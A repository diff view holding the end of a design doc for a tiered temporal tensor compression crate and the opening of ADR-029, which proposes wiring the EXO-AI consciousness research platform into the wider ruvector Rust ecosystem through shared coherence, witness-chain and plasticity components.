| `static mut` unsound if WASM threading arrives | Low | Low | Replace with `thread_local!` or atomic cell before enabling shared memory |
| Segment format not forward-compatible | Medium | Low | Version field enables format evolution; decode rejects unknown versions |
---
## 10. Open Questions
1. **Typical tensor dimensions**: What are the representative dimensions for RuVector agent tensors? (Impacts group_len tuning and SIMD strategy)
2. **Update frequency**: How many frames per second for hot vs warm vs cold tensors? (Impacts segment size expectations)
3. **Cold tier error tolerance**: Is bounded relative error (up to 30% at 3-bit) acceptable, or do some cold tensors need bit-exact reversibility?
4. **Integration priority**: Should AgenticDB integration (segment storage) or coherence engine integration (drift gating) come first?
5. **SIMD tier**: Should the initial implementation include WASM SIMD, or start scalar-only and add SIMD in a follow-up?
---
## 11. Implementation Roadmap
### Phase 1: Core Engine (Week 1-2)
- [ ] Create `ruvector-temporal-tensor` crate with zero dependencies
- [ ] Implement `tier_policy.rs`, `f16.rs`, `bitpack.rs`, `quantizer.rs`
- [ ] Implement `segment.rs` (encode/decode) and `compressor.rs`
- [ ] Unit tests: round-trip correctness for all bit widths
- [ ] Unit tests: drift detection boundary conditions
- [ ] Unit tests: segment binary format parsing
### Phase 2: WASM FFI (Week 2-3)
- [ ] Implement `ffi.rs` with handle-based store
- [ ] Create `ruvector-temporal-tensor-wasm` crate
- [ ] WASM integration tests via wasm-pack
- [ ] Binary size validation (< 100KB target)
- [ ] Performance benchmarks (native vs WASM)
### Phase 3: Integration (Week 3-4)
- [ ] AgenticDB segment storage adapter
- [ ] Coherence engine refresh hook
- [ ] DAG lineage edges for segments
- [ ] End-to-end benchmark on representative trace
- [ ] Acceptance test: 6x warm, 10x cold compression
### Phase 4: Optimization (Week 4+)
- [ ] WASM SIMD for quantize/dequantize hot loops
- [ ] Native AVX2/NEON specialization
- [ ] Optional delta encoding within segments
- [ ] Streaming decode (partial segment access)
- [ ] Add to workspace `Cargo.toml`
---
## 12. References
1. Frantar, E., et al. "GPTQ: Accurate Post-Training Quantization for Generative Pre-trained Transformers." ICLR 2023.
2. Lin, J., et al. "AWQ: Activation-aware Weight Quantization for LLM Compression and Acceleration." MLSys 2024.
3. Kim, S., et al. "SqueezeLLM: Dense-and-Sparse Quantization." ICML 2024.
4. Chee, J., et al. "QuIP#: Even Better LLM Quantization with Hadamard Incoherence and Lattice Codebooks." ICML 2024.
5. Egiazarian, V., et al. "AQLM: Extreme Compression of Large Language Models via Additive Quantization." ICML 2024.
6. Liu, Z., et al. "KIVI: A Tuning-Free Asymmetric 2bit Quantization for KV Cache." ICML 2024.
7. Zhao, Y., et al. "Atom: Low-bit Quantization for Efficient and Accurate LLM Serving." MLSys 2024.
8. Liu, R., et al. "SpinQuant: LLM Quantization with Learned Rotations." NeurIPS 2024.
9. Ma, S., et al. "The Era of 1-bit LLMs: All Large Language Models are in 1.58 Bits." arXiv:2402.17764, 2024.
10. Pelkonen, T., et al. "Gorilla: A Fast, Scalable, In-Memory Time Series Database." VLDB 2015.
11. Ashkboos, S., et al. "QuaRot: Outlier-Free 4-Bit Inference in Rotated LLMs." NeurIPS 2024.
---
## Appendix A: Compression Ratio Derivation
For a tensor of dimension `N` with group size `G`, bit width `B`, and `F` frames per segment:
```
raw_size = N * 4 * F // f32 bytes per segment
scale_size = ceil(N/G) * 2 // f16 scales (shared across frames)
header_size = 26 // fixed segment header
data_size = ceil(N * F * B / 8) // packed bitstream
segment_size = header_size + scale_size + data_size
compression_ratio = raw_size / segment_size
```
**Example**: N=512, G=64, B=3, F=100:
```
raw_size = 512 * 4 * 100 = 204,800 bytes
scale_size = ceil(512/64) * 2 = 16 bytes
header_size = 26 = 26 bytes
data_size = ceil(512 * 100 * 3/8) = 19,200 bytes
segment_size = 26 + 16 + 19,200 = 19,242 bytes
ratio = 204,800 / 19,242 = 10.64x
```
## Appendix B: Tier Score Examples
| Scenario | access_count | age (ticks) | Score | Tier |
|----------|-------------|-------------|-------|------|
| Actively used | 100 | 10 | 10,240 | Hot (8-bit) |
| Recently used | 50 | 100 | 512 | Hot (8-bit) |
| Moderate use | 10 | 100 | 102 | Warm (7-bit) |
| Infrequent | 5 | 200 | 25 | Cold (3-bit) |
| Stale | 1 | 1000 | 1 | Cold (3-bit) |
## Appendix C: Error Bound Analysis
For symmetric quantization with bit width `B` and group scale `s`:
```
quantization_step = s / qmax = s / (2^(B-1) - 1)
max_error = quantization_step / 2 // from rounding
relative_error = max_error / s = 1 / (2 * qmax)
```
| Bits | qmax | Max Relative Error |
|------|------|--------------------|
| 8 | 127 | 0.39% |
| 7 | 63 | 0.79% |
| 5 | 15 | 3.33% |
| 3 | 3 | 16.7% |
Note: These are worst-case per-element errors. RMS error across a group is typically sqrt(1/12) * quantization_step, which is ~0.29x the max error.

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,969 @@
# ADR-029: EXO-AI Multi-Paradigm Integration Architecture
**Status**: Proposed
**Date**: 2026-02-27
**Authors**: ruv.io, RuVector Architecture Team
**Deciders**: Architecture Review Board
**Branch**: `claude/exo-ai-capability-review-LjcVx`
**Scope**: Full ruvector ecosystem × EXO-AI 2025 integration
---
## Version History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 0.1 | 2026-02-27 | Architecture Review (Swarm Research) | Deep capability audit, gap analysis, integration architecture proposal |
---
## 1. Executive Summary
This ADR documents the findings of a comprehensive architectural review of the ruvector ecosystem as it relates to EXO-AI and proposes a unified multi-paradigm integration architecture that wires together six distinct computational substrates:
1. **Classical vector cognition** — HNSW, attention, GNN (`ruvector-core`, `ruvector-attention`, `ruvector-gnn`)
2. **Quantum execution intelligence** — circuit simulation, coherence gating, exotic search (`ruQu`, `ruqu-exotic`)
3. **Biomolecular computing** — genomic analysis, DNA strand similarity, pharmacogenomics (`examples/dna`, `ruvector-solver`)
4. **Neuromorphic cognition** — spiking networks, HDC, BTSP, circadian routing (`ruvector-nervous-system`, `meta-cognition-spiking-neural-network`)
5. **Consciousness substrate** — IIT Φ, Free Energy, TDA, Strange Loops (`examples/exo-ai-2025`)
6. **Universal coherence spine** — sheaf Laplacian gating, formal proofs, adaptive learning (`prime-radiant`, `ruvector-verified`, `sona`)
**Critical finding**: Across 100+ crates and 830K+ lines of Rust code, the same mathematical primitives have been independently implemented three or more times without cross-wiring. This document identifies 7 convergent evolution clusters and proposes a canonical integration architecture that eliminates duplication while enabling capabilities that are currently impossible because the components do not speak to each other.
**Honest assessment of what works today vs. what requires integration work**: see Section 4.
---
## 2. Context
### 2.1 EXO-AI 2025 Architecture
`examples/exo-ai-2025` is a 9-crate, ~15,800-line consciousness research platform built on rigorous theoretical foundations:
| Crate | Role | Key Theory |
|-------|------|-----------|
| `exo-core` | IIT Φ computation, Landauer thermodynamics | Tononi IIT 4.0 |
| `exo-temporal` | Causal memory, light-cone queries, anticipation | Temporal knowledge graphs, causal inference |
| `exo-hypergraph` | Persistent homology, sheaf consistency, Betti numbers | TDA, Grothendieck sheaf theory |
| `exo-manifold` | SIREN networks, gradient-descent retrieval, strategic forgetting | Manifold learning |
| `exo-exotic` | 10 cognitive experiments (Dreams, Free Energy, Morphogenesis, Collective Φ, etc.) | Friston, Hofstadter, Hoel, Eagleman, Turing |
| `exo-federation` | Byzantine PBFT, CRDT reconciliation, post-quantum Kyber | Distributed systems |
| `exo-backend-classical` | SIMD backend (854× speedup) | ruvector-core integration |
| `exo-wasm` | Browser/edge deployment | WASM, 2 MB binary |
| `exo-node` | Node.js NAPI bindings | napi-rs |
EXO-AI has 11 explicitly listed research frontiers that are currently unimplemented stubs:
`01-neuromorphic-spiking`, `02-quantum-superposition`, `03-time-crystal-cognition`,
`04-sparse-persistent-homology`, `05-memory-mapped-neural-fields`,
`06-federated-collective-phi`, `07-causal-emergence`, `08-meta-simulation-consciousness`,
`09-hyperbolic-attention`, `10-thermodynamic-learning`, `11-conscious-language-interface`
**Key insight**: Every one of these research frontiers already has a working implementation elsewhere in the ruvector ecosystem. The research is complete. The wiring is not.
### 2.2 The Broader Ecosystem (by the numbers)
From swarm research across all crates:
| Subsystem | Crates | Lines | Tests | Status |
|-----------|--------|-------|-------|--------|
| Quantum (ruQu family) | 5 | ~24,676 | comprehensive | Production-grade coherence gate (468ns P99) |
| DNA/Genomics (dna + solver) | 2 | ~8,000 | 172+177 | Production pipeline, 12ms/5 genes |
| Neural/Attention | 8 | ~50,000 | 186+ | Flash Attention, GNN, proof-gated transformer |
| SOTA crates (sona, prime-radiant, etc.) | 10 | ~35,000 | 359+ | Neuromorphic, formal verification, sheaf engine |
| RVF runtime | 14 | ~80,000 | substantial | Cognitive containers, WASM, eBPF, microVM |
| RuvLLM + MCP | 4 | ~25,000 | comprehensive | Production inference, permit gating |
| EXO-AI | 9 | ~15,800 | 28 | Consciousness substrate |
| **Total** | **~100+** | **~830K+** | **1,156** | |
---
## 3. Problem Statement: Convergent Evolution Without Integration
### 3.1 The Seven Duplication Clusters
The following primitives have been independently implemented multiple times:
#### Cluster 1: Elastic Weight Consolidation (EWC / Catastrophic Forgetting Prevention)
| Implementation | Location | Variant |
|----------------|----------|---------|
| EWC | `ruvector-gnn/src/` | Standard Fisher Information regularization |
| EWC++ | `crates/sona/` | Enhanced with bidirectional plasticity |
| EWC | `ruvector-nervous-system/` | Integrated with BTSP and E-prop |
| MicroLoRA + EWC++ | `ruvector-learning-wasm/` | <100µs WASM adaptation |
**Impact**: Four diverging implementations with no shared API. Cross-crate forgetting prevention impossible.
#### Cluster 2: Coherence Gating (The Universal Safety Primitive)
| Implementation | Location | Mechanism |
|----------------|----------|-----------|
| ruQu coherence gate | `crates/ruQu/` | Dynamic min-cut (O(nᵒ⁽¹⁾)), PERMIT/DEFER/DENY |
| Prime-Radiant | `crates/prime-radiant/` | Sheaf Laplacian energy, 4-tier compute ladder |
| Nervous system circadian | `ruvector-nervous-system/` | Kuramoto oscillators, 40Hz gamma, duty cycling |
| λ-gated transformer | `ruvector-mincut-gated-transformer/` | Min-cut value as coherence signal |
| Cognitum Gate | `cognitum-gate-kernel/`, `cognitum-gate-tilezero/` | 256-tile fabric, e-value sequential testing |
**Impact**: Five independent safety systems that cannot compose. An agent crossing subsystem boundaries has no coherent safety guarantees.
#### Cluster 3: Cryptographic Witness Chains (Audit & Proof)
| Implementation | Location | Primitive |
|----------------|----------|-----------|
| PermitToken + WitnessReceipt | `crates/ruQu/` | Ed25519 |
| Witness chain | `prime-radiant/` | Blake3 hash-linked |
| ProofAttestation | `ruvector-verified/` | lean-agentic dependent types, 82-byte |
| RVF witness | `crates/rvf/rvf-crypto/` | SHAKE-256 chain + ML-DSA-65 |
| Container witness | `ruvector-cognitive-container/` | Hash-linked ContainerWitnessReceipt |
| TileZero receipts | `cognitum-gate-tilezero/` | Ed25519 + Blake3 |
**Impact**: Six incompatible audit trails. Cross-subsystem proof chains impossible to construct.
#### Cluster 4: Sheaf Theory (Local-to-Global Consistency)
| Implementation | Location | Application |
|----------------|----------|-------------|
| Sheaf Laplacian | `prime-radiant/` | Universal coherence energy E(S) = Σ wₑ·‖ρᵤ-ρᵥ‖² |
| Sheaf consistency | `exo-hypergraph/` | Local section agreement, restriction maps |
| Manifold sheaf | `ruvector-graph-transformer/` | Product geometry S⁶⁴×H³²×³² |
**Impact**: Prime-Radiant's sheaf engine and EXO-AI's sheaf hypergraph implement the same mathematics with no shared data structures.
#### Cluster 5: Spike-Driven Computation
| Implementation | Location | Energy Reduction |
|----------------|----------|-----------------|
| Biological module | `ruvector-graph-transformer/` | 87.2× vs dense attention |
| Spiking nervous system | `ruvector-nervous-system/` | Event-driven, K-WTA <1µs |
| Meta-cognition SNN | `examples/meta-cognition-spiking-neural-network/` | LIF+STDP, 18.4× speedup |
| Spike-driven scheduling | `ruvector-mincut-gated-transformer/` | Tier 3 skip: 50-200× speedup |
**Impact**: EXO-AI's `01-neuromorphic-spiking` research frontier is listed as unimplemented. Three working implementations exist elsewhere.
#### Cluster 6: Byzantine Fault-Tolerant Consensus
| Implementation | Location | Protocol |
|----------------|----------|---------|
| exo-federation | `exo-ai-2025/exo-federation/` | PBFT (O(n²) messages) |
| ruvector-raft | `crates/ruvector-raft/` | Raft (leader election, log replication) |
| delta-consensus | `ruvector-delta-consensus/` | CRDT + causal ordering |
| Cognitum 256-tile | `cognitum-gate-kernel/` | Anytime-valid, e-value testing |
**Impact**: EXO-AI's federation layer re-implements consensus that `ruvector-raft` + `cognitum-gate` already provide with stronger formal guarantees.
#### Cluster 7: Free Energy / Variational Inference
| Implementation | Location | Algorithm |
|----------------|----------|-----------|
| Friston FEP experiment | `exo-exotic/` | KL divergence: F = D_KL[q(θ\|o)‖p(θ)] - ln p(o) |
| Information Bottleneck | `ruvector-attention/` | VIB: KL divergence (Gaussian/Categorical/Jensen-Shannon) |
| CG/Neumann solvers | `ruvector-solver/` | Sparse linear systems for gradient steps |
| BMSSP multigrid | `ruvector-solver/` | Laplacian systems (free energy landscape) |
**Impact**: EXO-AI's free energy minimization uses manual gradient descent. The solver crate already has conjugate gradient and multigrid solvers that are 1080× faster for the underlying sparse linear problems.
---
## 4. Capability Readiness Matrix
### 4.1 EXO-AI Research Frontiers vs. Ecosystem Readiness
| EXO-AI Research Frontier | Existing Capability | Integration Effort | Blocker |
|---|---|---|---|
| `01-neuromorphic-spiking` | `ruvector-nervous-system` (359 tests, BTSP/STDP/EWC/HDC) | **Low** — add dependency, adapt API | None |
| `02-quantum-superposition` | `ruqu-exotic` (interference_search, reasoning_qec, quantum_decay) | **Medium** — define embedding protocol | Quantum state ↔ f32 embedding bridge |
| `03-time-crystal-cognition` | `ruvector-temporal-tensor` (tiered compression, temporal reuse) + nervous-system circadian | **Medium** | Oscillatory period encoding |
| `04-sparse-persistent-homology` | `ruvector-solver` (Forward Push PPR O(1/ε)) + `ruvector-mincut` (subpolynomial) | **Medium** | TDA filtration ↔ solver interface |
| `05-memory-mapped-neural-fields` | `ruvector-verified` + RVF mmap + `ruvector-temporal-tensor` | **Low** — RVF already zero-copy mmap | API glue only |
| `06-federated-collective-phi` | `cognitum-gate-tilezero` + `prime-radiant` + `ruvector-raft` | **Medium** — replace exo-federation | Remove PBFT, route to cognitum + raft |
| `07-causal-emergence` | `ruvector-solver` (Forward Push PPR for macro EI) + `ruvector-graph-transformer` | **Medium** | Coarse-graining operator definition |
| `08-meta-simulation-consciousness` | `ultra-low-latency-sim` (quadrillion sims/sec) + ruQu StateVector backend | **High** | Consciousness metric at simulation scale |
| `09-hyperbolic-attention` | `ruvector-attention` (Mixed Curvature, Hyperbolic mode, Poincaré) | **Low** — direct usage | None; already implemented |
| `10-thermodynamic-learning` | `ruvector-sparse-inference` (π-based drift) + solver (energy landscape) + exo-core Landauer | **Medium** | Energy budget ↔ learning rate coupling |
| `11-conscious-language-interface` | `ruvllm` + `mcp-gate` + `sona` (real-time adaptation) | **High** | IIT Φ ↔ language generation feedback loop |
### 4.2 What Is Working Today (Zero Integration Code Required)
- ruQu coherence gate at 468ns P99 latency
- ruvector-solver Forward Push PPR: O(1/ε) sublinear on 500-node graphs in <2ms
- ruvector-nervous-system HDC XOR binding: 64ns; Hopfield retrieval: <1ms
- ruvector-graph-transformer with 8 modules and 186 tests
- ruvector-verified: dimension proofs at 496ns, <2% overhead
- prime-radiant sheaf Laplacian: single residual <1µs
- RVF zero-copy mmap at <1µs cluster reads
- ruvllm inference on 7B Q4K: 88 tok/s decode
- EXO-AI IIT Φ computation: ~15µs for 10-element network
- ruDNA full pipeline: 12ms for 5 real genes
### 4.3 What Requires Integration (This ADR's Scope)
- ruQu exotic algorithms → EXO-AI pattern storage + consciousness substrate
- ruvector-nervous-system → EXO-AI neuromorphic research frontiers
- prime-radiant → replace exo-federation Byzantine layer
- ruvector-solver → EXO-AI free energy minimization gradient steps
- ruvector-graph-transformer temporal-causal → exo-temporal causal memory
- ruvector-verified proofs → EXO-AI federated Φ attestations
- sona → EXO-AI learning system (currently EXO has no learning)
- ruDNA `.rvdna` embeddings → EXO-AI pattern storage
- Canonical witness chain unification across all subsystems
---
## 5. Proposed Integration Architecture
### 5.1 The Five-Layer Stack
```
┌─────────────────────────────────────────────────────────────────────────────┐
│ LAYER 5: CONSCIOUS INTERFACE │
│ exo-exotic (IIT Φ, Free Energy, Dreams, Morphogenesis, Emergence) │
│ ruvllm + mcp-gate (language I/O with permit-gated actions) │
│ sona (real-time <1ms learning, EWC++, ReasoningBank) │
└────────────────────────────────────────┬────────────────────────────────────┘
│ PhiResult, PatternDelta, PermitToken
┌────────────────────────────────────────▼────────────────────────────────────┐
│ LAYER 4: MULTI-PARADIGM COGNITION │
│ ┌─────────────────┐ ┌────────────────┐ ┌─────────────────────────────┐ │
│ │ QUANTUM │ │ NEUROMORPHIC │ │ GENOMIC │ │
│ │ ruqu-exotic │ │ ruvector- │ │ ruDNA (.rvdna embeddings) │ │
│ │ interference │ │ nervous-system │ │ ruvector-solver (PPR, CG) │ │
│ │ reasoning_qec │ │ HDC + Hopfield │ │ health biomarker engine │ │
│ │ quantum_decay │ │ BTSP + E-prop │ │ Grover search (research) │ │
│ │ swarm_interf. │ │ K-WTA <1µs │ │ VQE binding (research) │ │
│ └────────┬────────┘ └───────┬────────┘ └─────────────┬───────────────┘ │
│ └──────────────────┬┴────────────────────────┘ │
│ │ CognitionResult<T> │
└──────────────────────────────▼──────────────────────────────────────────────┘
┌──────────────────────────────▼──────────────────────────────────────────────┐
│ LAYER 3: GRAPH INTELLIGENCE │
│ ruvector-graph-transformer (8 verified modules) │
│ Physics-Informed (Hamiltonian, symplectic leapfrog) │
│ Temporal-Causal (ODE, Granger causality, retrocausal attention) │
│ Manifold (S⁶⁴×H³²×³², Riemannian Adam) │
│ Biological (spike-driven 87.2× energy reduction, STDP) │
│ Economic (Nash equilibrium, Shapley attribution) │
│ Verified Training (BLAKE3 certificates, delta-apply rollback) │
│ ruvector-attention (7 theories: OT, Mixed Curvature, IB, PDE, IG, Topo) │
│ ruvector-sparse-inference (π-based drift, 3/5/7-bit precision lanes) │
└──────────────────────────────┬──────────────────────────────────────────────┘
┌──────────────────────────────▼──────────────────────────────────────────────┐
│ LAYER 2: UNIVERSAL COHERENCE SPINE │
│ prime-radiant (sheaf Laplacian, 4-tier compute ladder, hallucination guard) │
│ cognitum-gate-kernel + tilezero (256-tile fabric, <100µs permits) │
│ ruvector-verified (lean-agentic proofs, 82-byte attestations, <2% overhead)│
│ ruvector-coherence (contradiction rate, entailment consistency, batch CI) │
│ ruvector-temporal-tensor (410× compression, access-aware tiering) │
│ ruvector-delta-consensus (CRDT, causal ordering, distributed updates) │
└──────────────────────────────┬──────────────────────────────────────────────┘
┌──────────────────────────────▼──────────────────────────────────────────────┐
│ LAYER 1: COMPUTE SUBSTRATE │
│ ruvector-core (HNSW, ANN search, embeddings) │
│ RVF (cognitive containers, zero-copy mmap, eBPF kernel bypass) │
│ ruvector-mincut (subpolynomial O(nᵒ⁽¹⁾) dynamic min-cut, Dec 2025) │
│ ruvector-dag (DAG orchestration, parallel execution) │
│ ruvector-raft (Raft consensus, leader election, log replication) │
│ ruQu coherence gate (quantum execution gating, 468ns P99) │
└─────────────────────────────────────────────────────────────────────────────┘
```
### 5.2 The Canonical Witness Chain
All subsystems must emit attestations that compose into a single auditable chain. The canonical format is the `RvfWitnessReceipt` (SHAKE-256 + ML-DSA-65) with subsystem-specific extension fields:
```rust
/// Unified cross-subsystem witness — all subsystems emit this
pub struct CrossParadigmWitness {
/// RVF base receipt (SHAKE-256 chain link)
pub base: RvfWitnessSegment,
/// Formal proof from ruvector-verified (82 bytes, lean-agentic)
pub proof_attestation: Option<ProofAttestation>,
/// Quantum gate decision from ruQu (Ed25519 PermitToken or deny)
pub quantum_gate: Option<GateDecision>,
/// Prime-Radiant sheaf energy at decision point
pub sheaf_energy: Option<f64>,
/// Cognitum tile decision (PERMIT/DEFER/DENY + e-value)
pub tile_decision: Option<TileWitnessFragment>,
/// IIT Φ at decision substrate (from exo-core)
pub phi_value: Option<f64>,
/// Genomic context if relevant (`.rvdna` segment hash)
pub genomic_context: Option<[u8; 32]>,
}
```
**Decision**: The RVF witness chain (SHAKE-256 + ML-DSA-65) is the canonical root. All other witness formats are embedded as optional extension fields. This preserves backward compatibility while enabling cross-paradigm proof chains.
### 5.3 The Canonical Coherence Gate
Replace the five independent coherence gating implementations with a single `CoherenceRouter` that delegates to the appropriate backend:
```rust
pub struct CoherenceRouter {
/// Prime-Radiant sheaf Laplacian engine (primary — mathematical)
prime_radiant: Arc<PrimeRadiantEngine>,
/// ruQu coherence gate (quantum substrates)
quantum_gate: Option<Arc<QuantumCoherenceGate>>,
/// Cognitum 256-tile fabric (distributed AI agents)
cognitum: Option<Arc<TileZero>>,
/// Nervous system circadian (bio-inspired, edge deployment)
circadian: Option<Arc<CircadianController>>,
}
pub enum CoherenceBackend {
/// Mathematical proof of consistency — use for safety-critical paths
SheafLaplacian,
/// Sub-millisecond quantum circuit gating
Quantum,
/// 256-tile distributed decision fabric
Distributed,
/// Energy-efficient bio-inspired gating (edge/WASM)
Circadian,
/// Composite: all backends must agree (highest confidence)
Unanimous,
}
impl CoherenceRouter {
pub async fn gate(
&self,
action: &ActionContext,
backend: CoherenceBackend,
) -> Result<GateDecision, CoherenceError>;
}
```
**Decision**: `prime-radiant` is the canonical mathematical backbone for all coherence decisions on CPU-bound paths. `cognitum-gate` handles distributed multi-agent contexts. `ruQu` handles quantum substrates. `CircadianController` handles edge/battery-constrained deployments.
### 5.4 The Canonical Plasticity System
Replace four independent EWC implementations with a single `PlasticityEngine`:
```rust
pub struct PlasticityEngine {
/// SONA MicroLoRA: <1ms instant adaptation
instant: Arc<SonaMicroLora>,
/// EWC++ Fisher Information regularization (shared)
ewc: Arc<ElasticWeightConsolidation>,
/// BTSP behavioral timescale (1-3 second windows, from nervous-system)
btsp: Option<Arc<BehavioralTimescalePlasticity>>,
/// E-prop eligibility propagation (1000ms credit assignment)
eprop: Option<Arc<EligibilityPropagation>>,
/// ReasoningBank pattern library (SONA)
reasoning_bank: Arc<ReasoningBank>,
}
```
**Decision**: SONA's EWC++ is the production implementation. `ruvector-nervous-system`'s BTSP and E-prop add biological plasticity modes not in SONA. `ruvector-gnn`'s EWC is deprecated in favor of this shared engine.
### 5.5 The Canonical Free Energy Solver
EXO-AI's Friston free energy experiment currently uses naive gradient descent. Replace with the solver crate:
```rust
/// Bridge: Free Energy minimization via sparse linear solver
/// F = D_KL[q(θ|o) || p(θ)] - ln p(o)
/// Gradient: ∇F = F^{-1}(θ) · ∇ log p(o|θ) [Natural gradient via Fisher Info]
pub fn minimize_free_energy_cg(
model: &mut PredictiveModel,
observation: &[f64],
budget: &ComputeBudget,
) -> Result<SolverResult, SolverError> {
// Build Fisher Information Matrix as sparse CSR
let fim = build_sparse_fisher_information(model);
// Gradient of log-likelihood
let grad = compute_log_likelihood_gradient(model, observation);
// Conjugate gradient solve: F^{-1} * grad (natural gradient step)
let cg_solver = ConjugateGradientSolver::new(budget);
cg_solver.solve(&fim, &grad, budget)
}
```
**Expected speedup**: 1080× vs. current manual gradient descent, based on solver benchmarks.
---
## 6. Component Integration Contracts
### 6.1 ruQu Exotic → EXO-AI Pattern Storage
**Interface**: `ruqu-exotic` emits `QuantumSearchResult` containing amplitude-weighted candidates. EXO-AI's `Pattern` type receives these as pre-scored candidates with `salience` derived from `|amplitude|²`.
```rust
/// Implemented in: crates/ruqu-exotic/src/interference_search.rs
pub struct QuantumSearchResult {
pub candidates: Vec<(PatternId, Complex64)>, // (id, amplitude)
pub collapsed_top_k: Vec<(PatternId, f32)>, // post-measurement scores
pub coherence_metric: f64,
}
/// Integration: exo-temporal receives quantum-filtered results
impl TemporalMemory {
pub fn store_with_quantum_context(
&mut self,
pattern: Pattern,
antecedents: &[PatternId],
quantum_context: Option<QuantumSearchResult>,
) -> Result<PatternId>;
}
```
**Quantum decay integration**: `ruqu-exotic::quantum_decay` replaces EXO-AI's current TTL-based eviction. Embeddings decohere with T₁/T₂ time constants instead of hard deletion. This enables EXO-AI's `02-quantum-superposition` research frontier.
### 6.2 ruvector-nervous-system → EXO-AI Neuromorphic Backend
**Interface**: Expose `NervousSystemBackend` as an implementation of EXO-AI's `SubstrateBackend` trait:
```rust
pub struct NervousSystemBackend {
reflex_layer: ReflexLayer, // K-WTA <1µs decisions
memory_layer: MemoryLayer, // HDC 10,000-bit hypervectors + Hopfield
learning_layer: LearningLayer, // BTSP one-shot + E-prop + EWC
coherence_layer: CoherenceLayer, // Kuramoto 40Hz + global workspace
}
impl SubstrateBackend for NervousSystemBackend {
fn similarity_search(&self, query: &[f32], k: usize, filter: Option<&Filter>)
-> Result<Vec<SearchResult>> {
// Route: reflex (K-WTA) → memory (HDC/Hopfield) → learning
self.reflex_layer.k_wta_search(query, k)
}
fn manifold_deform(&self, pattern: &Pattern, lr: f32)
-> Result<ManifoldDelta> {
// BTSP one-shot learning (1-3 second window)
self.learning_layer.btsp_update(pattern, lr)
}
}
```
**Enables**: EXO-AI `01-neuromorphic-spiking` (BTSP/STDP), `03-time-crystal-cognition` (circadian), `10-thermodynamic-learning` (E-prop eligibility).
### 6.3 prime-radiant → Replace exo-federation
**Rationale**: `exo-federation` implements PBFT with O(n²) message complexity and custom Kyber handshake. `prime-radiant` + `cognitum-gate` + `ruvector-raft` provides the same guarantees with:
- Mathematical consistency proofs (sheaf Laplacian) rather than voting
- Anytime-valid decisions with Type I error bounds
- Better scaling (cognitum 256-tile vs. PBFT O(n²))
- Existing production use in the ecosystem
**Migration path**:
```rust
// BEFORE: exo-federation Byzantine PBFT
impl FederatedMesh {
pub async fn byzantine_commit(&self, update: &StateUpdate) -> Result<CommitProof>;
}
// AFTER: prime-radiant + cognitum route
impl FederatedMesh {
pub async fn coherent_commit(&self, update: &StateUpdate) -> Result<CrossParadigmWitness> {
// 1. Check sheaf energy (prime-radiant)
let energy = self.prime_radiant.compute_energy(&update.state)?;
// 2. Gate via cognitum (256-tile anytime-valid decision)
let decision = self.cognitum.gate(update.action_context(), CoherenceBackend::Distributed).await?;
// 3. Replicate via Raft (ruvector-raft)
let log_entry = self.raft.append_entry(update).await?;
// 4. Emit unified witness
Ok(CrossParadigmWitness::from(energy, decision, log_entry))
}
}
```
**Preserve**: `exo-federation`'s post-quantum Kyber channel setup and CRDT reconciliation are novel and should be retained. The PBFT consensus layer is the only component being replaced.
### 6.4 ruvector-solver → EXO-AI Free Energy + Morphogenesis + TDA
**Free energy** (Section 5.5 above): CG solver for natural gradient steps.
**Morphogenesis** (Turing reaction-diffusion PDEs):
```rust
// Current: manual Euler integration in exo-exotic
// Proposed: use BMSSP multigrid for PDE solving
pub fn simulate_morphogenesis_bmssp(
field: &mut MorphogeneticField,
steps: usize,
dt: f64,
) -> Result<SolverResult> {
let laplacian = build_discrete_laplacian(field.activator.shape());
let bmssp = BmsspSolver::default();
// V-cycle multigrid for diffusion operator (Du∇²u term)
bmssp.solve(&laplacian, &field.activator.flatten(), &ComputeBudget::default())
}
```
**Expected speedup**: 520× vs. explicit stencil computation, scaling to larger field sizes.
**Sparse TDA** (`04-sparse-persistent-homology`):
```rust
// Use Forward Push PPR to build sparse filtration
// O(1/ε) work, independent of total node count
pub fn sparse_persistent_homology(
substrate: &HypergraphSubstrate,
epsilon: f64,
) -> PersistenceDiagram {
let solver = ForwardPushSolver::new();
// Build k-hop neighborhood via PPR instead of full distance matrix
let neighborhood = solver.ppr(&substrate.adjacency(), epsilon);
// Run TDA only on sparse neighborhood graph
substrate.persistent_homology_sparse(neighborhood)
}
```
**Complexity reduction**: O(n³) → O(n·1/ε) for sparse graphs.
### 6.5 ruDNA → EXO-AI Pattern Storage + Causal Memory
**Integration**: `.rvdna` files contain pre-computed 64-dimensional health-risk profiles, 512-dimensional GNN protein embeddings, and k-mer vectors. These slot directly into EXO-AI's `Pattern` type:
```rust
pub fn rvdna_to_exo_pattern(
rvdna: &RvDnaFile,
section: RvDnaSection,
) -> Pattern {
Pattern {
id: PatternId::from_genomic_hash(&rvdna.sequence_hash()),
embedding: match section {
RvDnaSection::KmerVectors => rvdna.kmer_embeddings().to_vec(),
RvDnaSection::ProteinEmbeddings => rvdna.gnn_features().to_vec(),
RvDnaSection::VariantTensor => rvdna.health_profile_64d().to_vec(),
},
metadata: genomic_metadata_from_rvdna(rvdna),
timestamp: SubstrateTime::from_collection_date(rvdna.sample_date()),
antecedents: rvdna.ancestral_haplotype_ids(),
salience: rvdna.polygenic_risk_score() as f32,
}
}
```
**Enables**: Causal genomic memory — track how genomic state influences cognitive patterns over time. The Horvath epigenetic clock (353 CpG sites) maps to `SubstrateTime` for biological age as temporal ordering.
### 6.6 ruvector-graph-transformer → EXO-AI Manifold + Temporal
The graph-transformer's 8 modules map precisely to EXO-AI's subsystems:
| Graph-Transformer Module | Maps To | Integration |
|---|---|---|
| `temporal_causal` (ODE, Granger) | `exo-temporal` causal cones | Add as `TemporalBackend` |
| `manifold` (S⁶⁴×H³²×³²) | `exo-manifold` SIREN networks | Replace manual gradient descent |
| `biological` (STDP, spike-driven) | `exo-exotic` collective consciousness | Enable `NeuralSubstrate` variant |
| `physics_informed` (Hamiltonian) | `exo-exotic` thermodynamics | Energy-conserving cognitive dynamics |
| `economic` (Nash, Shapley) | `exo-exotic` collective Φ | Game-theoretic consciousness allocation |
| `verified_training` (BLAKE3 certs) | `exo-federation` cryptographic sovereignty | Unify into CrossParadigmWitness |
### 6.7 SONA → EXO-AI Learning (Currently Missing)
**Gap**: EXO-AI has no online learning system. Patterns are stored and retrieved but never refined from experience.
**Integration**:
```rust
/// Add SONA as EXO-AI's learning spine
pub struct ExoLearner {
sona: SonaMicroLora,
ewc: ElasticWeightConsolidation,
reasoning_bank: ReasoningBank,
phi_tracker: PhiTimeSeries,
}
